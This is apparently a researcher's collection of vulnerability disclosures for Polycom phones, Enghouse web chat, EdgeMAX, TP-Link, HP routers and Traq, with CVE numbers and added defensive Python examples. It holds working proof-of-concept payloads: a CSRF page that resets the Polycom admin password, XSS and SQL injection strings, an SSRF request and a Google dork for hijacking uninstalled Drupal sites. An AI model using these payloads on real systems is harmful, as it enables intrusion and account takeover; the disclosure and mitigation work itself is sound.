Poly(com) VVX, Soundstation IP 5000, SoundPoint IP 335 Vulnerabilities

Phone Model VVX 311
Part Number 3111-48350-001 Rev:A
MAC Address X
IP Mode IPv4
IP Address X
UC Software Version 5.9.1.0615
Updater Version 5.9.7.12459

This web GUI appears to be the same as, or very similar to, the SoundPoint one, and most POST requests appear vulnerable to CSRF: the cookie-carried login/password included in each request can simply be dropped and the request re-crafted as a CSRF. For example, the following is a CSRF page that changes the admin password and turns on telnet. This works for the VVX model; however, the same CSRF did not work for the SoundStation and SoundPoint.

<html>
  <!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
        xhr.withCredentials = true;
        var body = "-----------------------------402251386101268401375671906\r\n" + 
          "Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3cdevice device.set=\"1\"\x3e\n" + 
          "\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" + 
          "\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" + 
          "\r\n" + 
          "-----------------------------402251386101268401375671906--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


This sends a file called polycomtelnet.cfg, which is the same XML carried in the request body above and looks like this:

<device device.set="1">
<auth device.auth.localAdminPassword.set="1" device.auth.localAdminPassword="123456"/>
<telnet diags.telnetd.enabled="0"></telnet>



Phone Model SoundStation IP 5000 & SoundPoint IP 335 (same firmware)
Part Number 3111-30900-001 Rev:H
MAC Address X
IP Address X
UC Software Version 4.0.14.1388
BootROM Software Version 5.0.14.0580

This is a POST XSS via CSRF to which the newest firmware of both the SoundStation and the SoundPoint is vulnerable. Since authentication is carried in a simple Cookie: Authorization= header, an XSS that exposes the cookie makes the credentials easy to recover by decoding the base64.

<html>
  <!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.128.17/form-submit" method="POST">
      <input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Most of these devices ship with default logins (user/123, admin/456). However, even if the company deploying them has changed the defaults, these CSRF vulnerabilities still apply, because it is the victim's own authenticated browser that submits the forged request.

Multiple vulnerabilities found in Enghouse/Zeacom web chat

Product: Web Chat versions 6.1.300.31, 6.2.284.34 and possibly others
Researcher: Matt Landers – mlanders@lucidcoast.com

Issue 1: Cross Site Scripting (XSS)

Versions 6.1.300.31, 6.2.284.34 and possibly others

CVE-2019-16950


The QueueName= parameter shown in the GET request below allows insertion of user-supplied JavaScript. An example of the cross-site scripting payload is shown in the screenshot below.

Proof of Concept:
 Copy and paste the following payload into your web browser, editing the request to insert the name of the domain you would like to test.

 http://example.com:8088/webChat/Main.aspx?QueueName=CHAT48809%22%3balert(document.cookie)%2f%2f572

Issue 2: Email tampering
Version 6.1.300.31

CVE-2019-16949


A user of the web chat software is allowed to send an archive of their chat log to the email address they specified at the beginning of the chat, where the user enters their name and email. This POST request can be modified to change both the message and the end recipient, as seen below.

The email is sent from the same user and domain name that the web chat is allotted, so it can be used in phishing campaigns against users on the same domain.

Proof of Concept:
 POST /WebChat/Chat.asmx/EmailTranscript HTTP/1.1
 Host: redacted.com:8088
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://redacted.com:8088/webChat/Main.aspx?QueueName=CHAT
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 217
 Connection: close
 Cookie:

 &ToEmail=victim@victim.com&Message=Click on this link for your refund!&WebServiceLocation=http://localhost:8088/WebService/

Issue 3: Server Side Request Forgery / Remote File Include

Version 6.1.300.31 is vulnerable to server side request forgery

CVE-2019-16948


In this instance, in any POST request we are able to replace the port number (8088) in the WebServiceLocation parameter with a range of ports, which reveals what is reachable on the web chat host's internal network as opposed to what general web traffic would see.

The response from an open port differs from that of a closed port, as shown in the following screenshot. The web chat software does not allow us to change the protocol, so anything other than http(s) throws an error; however, it is the type of error seen in the following screenshots that allows us to determine whether a port is open.

 Proof of Concept:
 POST /WebChat/General.asmx/DeleteDataPushFilter?UserSessionID=&filterName=WebChatTracker HTTP/1.1
 Host: redacted.com:8088
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://redacted.com:8088/webChat/Main.aspx?QueueName=CHAT
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 43
 Connection: close
 Cookie:

 WebServiceLocation=http://localhost:8085/WebService/

Version 6.2.284.34 is vulnerable to remote file include

CVE-2019-16951

I have included this as part of Issue 3 as I believe they are related.
Specifically with this version of the web chat software we were able to replace the localhost attribute with our own domain name. When the web chat server calls our domain after the Post request is sent, it retrieves our data and displays it.


Also worth mentioning: the request the web chat server sends to our domain carries information the public should not have, including path names and internal IP addresses. See the screenshot below for examples.

Resource Consumption DOS on Edgemax v1.10.6

Resource consumption denial of service. This was reported last year and has been fixed as of version 2.0.3. It has been assigned CVE-2019-16889.

1: The request below shows that when you feed the beaker.session.id cookie variable a payload of 250 characters or more, the web management portal will produce an error page showing full path disclosure and more as shown in screenshots error1.png and error2.png.

GET / HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: beaker.session.id=v8iG24fDKn8x5uD3V2uICZA1FJEoUJpqH5VTa03xB5blDRNOe5AfFp2GNIBpDX8th1IO8sS5ejsz4Swm175nUvipwU211S4n4RtCv0A6r18fsgJbrrbmhFT9k2cAXF3yyg0Uu0B0wPOWP7BOrMVnXp44aHoXSfJ06ZXk7HrD5J5R9AZIgQLmGutM9ESNxw3CVJtW4Rfxeh7JE2AD04B3g78FxRgBxY82I2Gzf6ZPMsc39d37LM90dd9cFA
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

[Screenshot: EdgeosError1]

[Screenshot: EdgeosError2]

2: When a payload of valid length (249 characters or less) is provided, it is stored as a *.cache filename in the /var/run/beaker/container_file/ directory. This can easily be turned into a denial of service by filling up the device's storage with requests carrying unique beaker.session.id values. The web portal will then display either a 500 error, as shown here

[Screenshot: DOS1]

or a python error screen as shown here.

[Screenshot: DOS2.1]

[Screenshot: DOS2.2]

Typically the web portal stops functioning once the /run mount reaches 50% usage; in testing this was reached by sending requests with the values 1 through 15681 as the beaker.session.id, but any payload length up to 249 characters can be used. The device can be recovered by deleting all files within the /var/run/beaker/container_file/ directory.

Once the /run mount can no longer accept files, /var/log starts to fill with complaints about being unable to write to /var/run/beaker/container_file/; after /var/log fills up as well, the device stops responding altogether until it has been power cycled.

3: This process can take upwards of 20 minutes, so it is a slow denial of service.

Impact

Any resources served by the EdgeMAX device will be unavailable until the physical device has its power cycled, after which it should function as normal. However, it would be easy to simply perform the attack again once it has been brought back online.
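Two defensive pieces a practitioner would want around a file-backed session store like this, as an added example that is not Ubiquiti's or Beaker's code: a cookie filter that refuses session ids which do not look server-issued (so an attacker-chosen string never becomes a file name under container_file/), and a log-based detector that flags a client presenting many distinct session ids, the signature of the disk-fill described above. The session id pattern, the access-log format, the threshold and the sample log lines are assumptions constructed for this example.

```python
# Added example, not code from Ubiquiti or Beaker: defence in depth for the
# beaker.session.id disk-fill described above. Two pieces: a cookie filter
# that drops session ids which do not look server-issued (so an attacker-
# chosen string never becomes a file name under container_file/), and a
# log-based detector for a client presenting many distinct session ids.
# The id pattern, log format, threshold and sample log lines are assumptions.
import re
from collections import defaultdict

# Assumed: the server issues fixed-length hex session ids. Beaker's file
# backend stores each id as "<id>.cache"; 249 characters plus ".cache" is
# exactly 255 bytes, the usual NAME_MAX, which is consistent with the
# 250-character error threshold in step 1.
SESSION_ID_RE = re.compile(r"^[0-9a-f]{32,40}$")
CACHE_SUFFIX = ".cache"
NAME_MAX = 255


def session_id_is_plausible(session_id):
    """Only ids matching the issued format may reach the session backend."""
    return bool(SESSION_ID_RE.match(session_id))


def would_exceed_name_max(session_id):
    """Mirror the file-name limit that produced the error page in step 1."""
    return len(session_id) + len(CACHE_SUFFIX) > NAME_MAX


def strip_bad_session_cookie(environ):
    """WSGI-style helper: rewrite HTTP_COOKIE without any beaker.session.id
    that fails the format check. Returns (new_cookie_header, dropped)."""
    raw = environ.get("HTTP_COOKIE", "")
    kept, dropped = [], False
    for part in (p.strip() for p in raw.split(";")):
        if not part:
            continue
        name, _, value = part.partition("=")
        if name.strip() == "beaker.session.id" and not session_id_is_plausible(value.strip()):
            dropped = True      # Beaker will then mint a fresh, well-formed id
            continue
        kept.append(part)
    environ["HTTP_COOKIE"] = "; ".join(kept)
    return environ["HTTP_COOKIE"], dropped


# Assumed access-log shape: client IP first, cookie value logged in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*beaker\.session\.id=(?P<sid>[^;" ]+)')


def detect_session_churn(log_lines, threshold=50):
    """Return {client_ip: distinct_session_ids} for clients at or above
    threshold; a normal browser reuses one id, the DoS cycles thousands."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group("ip")].add(m.group("sid"))
    return {ip: len(ids) for ip, ids in seen.items() if len(ids) >= threshold}


# Constructed sample log: one client cycling ids 1..60, one normal client.
NORMAL_ID = "a" * 32
SAMPLE_LOG = [f'203.0.113.5 - - "GET / HTTP/1.1" 500 "beaker.session.id={i}"'
              for i in range(1, 61)]
SAMPLE_LOG += [f'198.51.100.9 - - "GET / HTTP/1.1" 200 "beaker.session.id={NORMAL_ID}"'] * 5


if __name__ == "__main__":
    env = {"HTTP_COOKIE": "beaker.session.id=1; theme=dark"}
    print(strip_bad_session_cookie(env))      # ('theme=dark', True)
    print(would_exceed_name_max("x" * 250))   # True
    print(detect_session_churn(SAMPLE_LOG))   # {'203.0.113.5': 60}
```

The format filter alone does not stop a client that generates well-formed random ids, which is why the churn detector (or an equivalent rate limit on new-session creation per client) is the second half of the mitigation.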

TPLink tl-wr802n Auth bypass

The TP-Link TL-WR802N version 4.0 is vulnerable to authentication bypass by altering the Referer header.

I did not realize that this vulnerability had been previously disclosed except that the model mentioned above was not included or known about in the initial report.  I am linking to securelayer7’s finding first so that you can read it.

http://blog.securelayer7.net/time-to-disable-tp-link-home-wifi-router/

I really wanted to like this device but I couldn’t make myself use it in a public setting.  That being said tplink was very fast in providing a beta firmware for me to try which fixed the issue with this specific model.

As this vulnerability has been covered in depth, I will just provide the request screenshots of the Authenticated, Unauthenticated, and Bypass in Burp.

Authenticated

[Screenshot: authorizedrequest]

Unauthenticated

[Screenshot: 403forbidden]

Next, all that is required is to add Referer: http://192.168.0.1/mainFrame.htm to the request, and you will be allowed access to most functions; again, see securelayer7's post about this, as it has been tested in depth.

Bypass

[Screenshot: auth-bypass]

HP R110 Wireless 11n VPN AM Router Credential exposure.

I had recently purchased a HP R110 Wireless 11n VPN AM Router (Product No: J9974A).

[Image: 223867]

I had noticed that by default it communicates via HTTP instead of HTTPS. The reason this is an issue is that every single request the user sends after logging in carries the login and password in the GET/POST requests to the router.

[Photo: img_20181206_181635.jpg]

I apologize for the bad “screenshot” phone camera photo.

The ‘username=admin; password=admin’ shows up in every request after login. I used the default credentials in this example so that I didn’t give my own away.
This might not seem like a big deal but anyone sniffing the network could obtain these credentials.

Traq 3.7.1 multiple vulnerabilities.

=================================================

Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.

CVE: CVE-2018-20780
Product: Traq
Version: 3.7.1
Vendor site: https://traq.io/
Researcher: Matt Landers
matt@mjlanders.com
twitter.com/matthewjland
https://mjlanders.org/

=================================================

1: Username enumeration via
http://example.com/home/example/public_html/traq/users/1 = admin
http://example.com/home/example/public_html/traq/users/2 = anonymous
http://example.com/home/example/public_html/traq/users/3 = user etc etc

2: Reflected XSS
A GET reflected XSS appears in the search parameter of the following request.
https://example.com/traq/tickets?search=">alert(document.domain)

3: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the email parameter in the following request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/usercp" method="POST">
<input type="hidden" name="name" value="Administrator" />
<input type="hidden" name="email" value="tt1kr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;awezh" />
<input type="hidden" name="watch_created_tickets" value="1" />
<input type="hidden" name="locale" value="enus" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

4: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the name and email parameter in the following request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">
<input type="hidden" name="username" value="user1" />
<input type="hidden" name="name" value="guyj&quot;&gt;&lt;img src=a onerror=alert(document.domain)&gt;mztcr" />
<input type="hidden" name="password" value="userpass" />
<input type="hidden" name="email" value="test@testy2.comlgfyr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;jj194" />
<input type="hidden" name="group_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
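Every XSS in this post (the SoundStation/SoundPoint POST XSS, the Enghouse QueueName reflection and the Traq items 2 to 4) is the same defect: user input placed into a page without encoding for the context it lands in. The following is an added example, not code from Polycom, Enghouse or Traq, of context-aware output encoding for the three sinks involved: HTML text, a quoted HTML attribute, and a JavaScript string literal (the QueueName payload above breaks out of one with ";). The template and function names are assumptions; the payload strings are the ones shown in the PoCs above. Note that the entity-encoded value the Traq PoC form has to carry (&quot;&gt;&lt;img ...) is exactly what correct attribute encoding on output produces.

```python
# Added example, not code from Polycom, Enghouse or Traq: context-aware output
# encoding, the fix for the reflected and stored XSS issues in this post.
# Three sinks are covered: HTML text, a quoted HTML attribute, and a
# JavaScript string literal. The template and function names are
# assumptions; the payload strings are copied from the PoCs above.
import html
import json


def encode_html_text(value):
    """For element content: & < > become entities."""
    return html.escape(value, quote=False)


def encode_html_attr(value):
    """For a quoted attribute: additionally " and ' so the quote cannot close."""
    return html.escape(value, quote=True)


def encode_js_string(value):
    """For a JS string literal inside <script>: json.dumps yields a quoted,
    backslash-escaped literal; < and > are then written as \\u003c / \\u003e
    so the value can never contain markup, including a premature </script>."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def js_round_trips(value):
    """The encoded literal must still decode to the original string."""
    return json.loads(encode_js_string(value)) == value


def render_search_page(search, queue_name):
    """Assumed template that places user input in all three contexts."""
    return (
        '<input type="text" name="search" value="%s">\n'
        '<p>Results for %s</p>\n'
        '<script>var queue = %s;</script>'
    ) % (encode_html_attr(search), encode_html_text(search), encode_js_string(queue_name))


def count_script_tags(page):
    """Only the template's own <script> should remain in the rendered page."""
    return page.lower().count("<script>")


# Payload shapes from the PoCs above.
POLYCOM_STYLE = '"><Script>alert(document.cookie)</Script>'
TRAQ_STYLE = 'tt1kr"><img src=a onerror=alert(document.cookie)>awezh'
ENGHOUSE_STYLE = 'CHAT48809";alert(document.cookie)//572'


if __name__ == "__main__":
    print(render_search_page(TRAQ_STYLE, ENGHOUSE_STYLE))
    print(count_script_tags(render_search_page(POLYCOM_STYLE, "</script><script>alert(1)</script>")))  # 1
```

The JS-context encoder is the one most often missed: HTML-escaping a value that lands inside a <script> string literal does nothing against the "; break-out, so the encoder must follow the sink, not the source.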

5: Admin user creation via CSRF, using the same request as item 4 above. The XSS could be used to notify the attacker when the admin triggers the CSRF; the admin account is created by setting group_id to 1 in this request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">
<input type="hidden" name="username" value="testadmin" />
<input type="hidden" name="name" value="guy smiley" />
<input type="hidden" name="password" value="testadmin" />
<input type="hidden" name="email" value="testadmin@evil.com" />
<input type="hidden" name="group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
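The Polycom config-import CSRF at the top of this post and the Traq admin-creation CSRF here succeed for the same reason: the server accepts any state-changing request that arrives with the victim's cookies. The following is an added example, not Polycom's or Traq's code, of the server-side guard both lack: an Origin/Referer check (browsers attach Origin to cross-site POSTs, including the multipart XHR in the Polycom PoC, and page script cannot remove it) plus a synchronizer token kept in the session, which an attacker's page cannot read. It is written as a plain function over a request dict so it runs offline; the request shape, the site origin (https://192.168.128.11), the header and field names and the sample requests are assumptions.

```python
# Added example, not Polycom's or Traq's code: a server-side CSRF guard of
# the kind both web UIs above lack. It checks Origin/Referer and a
# synchronizer token kept in the session, written as a plain function over
# a request dict so it can be exercised offline. The request shape, the
# site origin, the header names and the sample requests are assumptions.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://192.168.128.11"       # assumed: the device's own origin
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session):
    """Mint a per-session token; the page embeds it in every form/XHR."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else None


def csrf_check(request, session, site_origin=SITE_ORIGIN):
    """Return (allowed, reason). request = {"method", "headers", "form"}."""
    if request["method"].upper() not in STATE_CHANGING:
        return True, "safe method"
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    # 1. Source check. Browsers attach Origin to cross-site POSTs (including
    #    the multipart XHR in the Polycom PoC) and page script cannot strip it;
    #    fall back to Referer for older clients. Reject when neither is present.
    source = headers.get("origin") or _origin_of(headers.get("referer", ""))
    if source is None:
        return False, "no Origin or Referer on state-changing request"
    if source != site_origin:
        return False, f"cross-site request from {source}"
    # 2. Token check. The attacker's page can make the browser send cookies
    #    but cannot read the token out of the victim's session or page.
    expected = session.get("csrf_token")
    supplied = request.get("form", {}).get("csrf_token") or headers.get("x-csrf-token")
    if not expected or not supplied or not hmac.compare_digest(
            expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo():
    """Forged request in the shape of the config-import CSRF above versus a
    legitimate same-origin request carrying the token."""
    session = {}
    token = issue_csrf_token(session)
    forged = {
        "method": "POST",
        "headers": {"Origin": "http://attacker.example", "Cookie": "session=abc"},
        "form": {"myfile": '<device device.set="1">...'},
    }
    legit = {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN, "Cookie": "session=abc"},
        "form": {"myfile": "...", "csrf_token": token},
    }
    return csrf_check(forged, session), csrf_check(legit, session)


if __name__ == "__main__":
    print(demo())
```

The two checks are deliberately independent: the Origin check stops the forged request before any token comparison, and the token check still holds for a client that sends no Origin or Referer at all, so neither can be bypassed by stripping a header.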

6: SQL injection via the search parameter. I was able to have sqlmap return the database's current user and database type. The following is the SQL injection I used in order to achieve this.

Parameter: search (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=') RLIKE (SELECT (CASE WHEN (6383=6383) THEN '' ELSE 0x28 END)) AND ('yDch'='yDch&order_by=component.asc

(@DamianEbelties): https://twitter.com/DamianEbelties

Sent this cleaned up payload, thanks!

"%%27)%20and%20updatexml(null,concat(0x0a,version()),null)--%20-"
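The sqlmap boundary above (close the quote and the parenthesis, inject, then re-open with AND ('yDch'='yDch) tells you the search value was spliced directly into a parenthesised WHERE clause. The following added example, not Traq's code, builds such a query both ways, string concatenation versus a bound parameter, against an in-memory SQLite table so it runs offline. The schema, rows and function names are constructed; the payload keeps the boundary shape of item 6 but uses a database-neutral tautology, since RLIKE and updatexml are MySQL-only.

```python
# Added example, not Traq's code: the search query built two ways, string
# concatenation versus a bound parameter, run against an in-memory SQLite
# table so it works offline. Schema, rows and function names are
# constructed; the payload reuses the boundary shape of the sqlmap payload
# above (close the quote and parenthesis, then append a condition) with a
# database-neutral condition, since RLIKE and updatexml are MySQL-only.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tickets (id INTEGER PRIMARY KEY, summary TEXT, project_id INTEGER);
        INSERT INTO tickets VALUES (1, 'login fails', 1), (2, 'export broken', 1), (3, 'typo', 2);
    """)
    return conn


def search_vulnerable(conn, search, project_id=1):
    """User input spliced straight into the WHERE clause: the pattern behind
    the boolean-based blind finding in item 6."""
    sql = ("SELECT id FROM tickets WHERE project_id = %d AND (summary LIKE '%s') ORDER BY id"
           % (project_id, search))
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, search, project_id=1):
    """Same query with the search value bound as a parameter; the database
    receives the payload as an opaque string, never as SQL."""
    sql = "SELECT id FROM tickets WHERE project_id = ? AND (summary LIKE ?) ORDER BY id"
    return [row[0] for row in conn.execute(sql, (project_id, search))]


# Same ') ... AND ('yDch'='yDch boundary as the sqlmap payload in item 6,
# with a neutral tautology in place of the MySQL-specific RLIKE expression.
INJECTION = "') OR (1=1) AND ('yDch'='yDch"


def demo():
    conn = make_db()
    return {
        "normal_vuln": search_vulnerable(conn, "login%"),
        "normal_safe": search_safe(conn, "login%"),
        "inject_vuln": search_vulnerable(conn, INJECTION),   # project filter bypassed
        "inject_safe": search_safe(conn, INJECTION),         # treated as literal text
    }


if __name__ == "__main__":
    for name, ids in demo().items():
        print(f"{name:12} -> {ids}")
```

With the payload, the concatenated query becomes ... AND (summary LIKE '') OR (1=1) AND ('yDch'='yDch') ..., which returns every ticket regardless of project; the parameterised version returns nothing because the database compares summaries against the literal text of the payload.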

7: There appears to be no session timeout; the admin account stayed logged in for two days.

Drupal takeover

Google dork for populated but not installed versions of Drupal

inurl:install.php select an installation profile

negative intext result: drupal already installed
positive intext result: select an installation profile

If Drupal is populated but not installed, you can install Drupal and become admin.